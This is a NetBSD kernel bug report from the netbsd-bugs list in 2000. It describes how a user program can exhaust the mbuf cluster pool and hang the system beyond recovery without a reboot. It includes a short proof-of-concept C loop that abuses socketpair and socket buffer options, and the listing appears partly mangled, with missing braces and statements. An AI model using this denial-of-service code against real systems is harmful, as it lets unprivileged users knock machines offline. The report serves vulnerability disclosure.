Subject: kern/9347: user program can exhaust mclpool and hang system
To: None <>
From: Erik E. Fair <>
List: netbsd-bugs
Date: 02/03/2000 19:24:38
>Number:         9347
>Category:       kern
>Synopsis:       user program can exhaust mclpool and hang system
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Thu Feb  3 19:24:00 2000
>Originator:     Erik E. Fair
	<a href="">International Organization of Internet Clock Watchers</a>
>Release:        1.4.2_ALPHA
System: NetBSD 1.4.2_ALPHA NetBSD 1.4.2_ALPHA (DIGITAL) #10: Mon Jan 10 22:38:56 PST 2000 alpha

	A user program playing with socket buffer options and
	socketpair(2) can exhaust the mclpool, and hang the system:

	WARNING: mclpool limit reached; increase NMBCLUSTERS

	The process is unkillable. This can be used to hang a NetBSD
	system in such a way that a reboot is required to regain
	control of the system.

	Userland programs should not be able to do this.

	This code has been tested on 1.4.2_ALPHA kernels for sparc and alpha

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);